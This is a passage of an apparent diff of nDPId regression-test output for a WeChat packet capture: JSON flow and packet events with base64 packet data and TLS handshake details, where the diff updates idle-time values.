Lf20sskbghw4Wvw2P5GvZ6Z0iUqrAzGSGc0IroovL34w3TMmjBnTPzAWKnwYJxIrcFH65r\/43AXULA7mwVKw7TuryWaAn8PVofDMn5VL+m8Bc4anaE3270Gx7DXXa3CWGylYl6IhspD51Ji7UqD6pJpDanmkxF7QRS0mZz7M+VCAuE5+TvKpba5WKwmCrXKMkHXnBfHSx4yC\/BngUmyj5AqU\/35FBtHK2MhZhT3uv3ixGib\/DhROgxNj\/fCIDmyLmZy6LuI15IWBQr2uiGWD15jLW9srpQ3r\/cpXrjFWrIOILP7BDqFX16AVMtIyhn8QUmpyMBzWR3rPBVnAwwCQUSi7lOuHYSBa2JAApapl8ibPeq+IESORJ2WC1jpiGlKVsyKHvCUxM4DB9CDGl+VMCLfBwTUsv9jC9A0oISxfI+skno\/pMiMhfE+1+tVpq0kVbytQk5I14sgZgoXLliJYkFCOr3ikDyMImPkBDegikF\/nhKUricS6KkRKOBVEDYofUgm6hebzs7TAwbIX0LHGrieMSNYdiZ\/RaP9BKZ7WUS7z8Jvlw3DtdXYHHGY\/9m62j8jgUA89FYp2sdoaRFheoQUmxEE6EpSZHWMo5+AT1rvxDTcNLYyAF\/NKlyP79gaAWae04vlwFQ4Bupkoby3AV8qNrlb42pc54gLBwr2\/V8SfP1Jf8GHKLnbnMMGzz8c8g08IQe\/1e7EH9oyogw0WeUU2ddyxaRPwa4eLAdObHTP\/jn7fsHAYVorRI56TLQ62d12KS2GZw3\/dElBm43NGOyNU1Hp381LUrTlDOWD2CkkP1QCRN+z
ezQnIAdftR9GtZfdliGgi4n+DRQuugUUjAENUiyLbjua9o3CfXKyGh5RlHt3r219Xp7bzpU2Sa3x2tOlotON5hkk2pmORaeO3NrbIHwpGOzFl20\/4Mhk6xhdUZeHJoEN7V1+kqNLH9CANDu7wpMSMlhqJfpnckBvaCh9BXX3VOJErUyDwJ\/yEG1ZNKGdvcDhAfCDrZsIbxElU8wBdoFg5g3GjSgWUZyHIUdESjz3nA05zyGh0UQ5UNTBZNmAzAGEZvPJPDUf"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167654504,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsBAAEAGBoXAqAFny82XotNaAbub+DW+SvgsEIARAOUK7AAAAQEICgAx4GBFrgFX"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1009,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1492167654504,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167654504,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsBAAEAGBoXAqAFny82XotNaAbub+DW+SvgsEIARAOUK7AAAAQEICgAx4GBFrgFX"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00731{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1492167669545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1492167669545,"pkt":"\/\/\/\/\/\/\/\/0CeIF3AECABFoADwPUUAAIARd2TAqAFkwKgB\/wCKAIoA3H9oEQ7+\/cCoAWQAigDGAAAgRUhFSkVQRkdFQkVPRU9FSkNORkFFRENBQ0FDQUNBQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAALAAAAAAAAAAAAOgDAAAAAAAAAAAsAFYAAwABAAEAAgA9AFxNQUlMU0xPVFxCUk9XU0UADACguw0AV09SS0dST1VQAAAAAAAAAAMKABAAgP4HAABHSU9WQU5OSS1QQwA="} 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1022,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167669545,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"wechat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1492167690433,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":50,"pkt_l4_len":12,"thread_ts_msec":1492167690433,"pkt":"AQBeAAAB8IQvSpdgCABGoAAkj9oAAAEC8bHAqAH+4AAAAZQEAAARZOybAAAAAAIAAAA="} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695237,"flow_last_seen":1492167695237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695237,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1492167695237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695237,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8M9xAAEAG4WDAqAFny82XotNlAbtEgzv7AAAAAKACchBSeAAAAgQFtAQCCAoAMggnAAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695488,"flow_last_seen":1492167695488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1492167695488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695488,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8xuRAAEAGTljAqAFny82XotNmAbsIrs6CAAAAAKACchD7hQAAAgQFtAQCCAoAMghmAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702WgJJlmRIM7\/KASN8ga\/wAAAgQFoAQCCApF0vJmADIIJwEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695562,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0M91AAEAG4WfAqAFny82XotNlAbtEgzv8oCSZZ4AQAOWASQAAAQEICgAyCHhF0vJm"} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1492167695854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695854,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702aaLHzgCK7Og6ASN8jmSwAAAgQFoAQCCApF0vKlADIIZgEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1492167695854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695854,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0xuVAAEAGTl\/AqAFny82XotNmAbsIrs6Dmix84YAQAOVLjAAAAQEICgAyCMFF0vKl"} 
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695237,"flow_last_seen":1492167695237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695237,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1492167695237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695237,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8M9xAAEAG4WDAqAFny82XotNlAbtEgzv7AAAAAKACchBSeAAAAgQFtAQCCAoAMggnAAAAAAEDAwc="} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167695488,"flow_last_seen":1492167695488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167695488,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1492167695488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695488,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8xuRAAEAGTljAqAFny82XotNmAbsIrs6CAAAAAKACchD7hQAAAgQFtAQCCAoAMghmAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1492167695562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695562,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG702WgJJlmRIM7\/KASN8ga\/wAAAgQFoAQCCApF0vJmADIIJwEDAwc="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1492167695562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695562,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0M91AAEAG4WfAqAFny82XotNlAbtEgzv8oCSZZ4AQAOWASQAAAQEICgAyCHhF0vJm"} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695237,"flow_last_seen":1492167695562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167695562,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1492167695854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167695854,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG702aaLHzgCK7Og6ASN8jmSwAAAgQFoAQCCApF0vKlADIIZgEDAwc="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1492167695854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167695854,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0xuVAAEAGTl\/AqAFny82XotNmAbsIrs6Dmix84YAQAOVLjAAAAQEICgAyCMFF0vKl"} +00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1057,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1059,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695237,"flow_last_seen":1492167695891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167695891,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167695488,"flow_last_seen":1492167696636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167696636,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1077,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167695488,"flow_last_seen":1492167697005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167697005,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1079,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167695488,"flow_last_seen":1492167697006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167697006,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
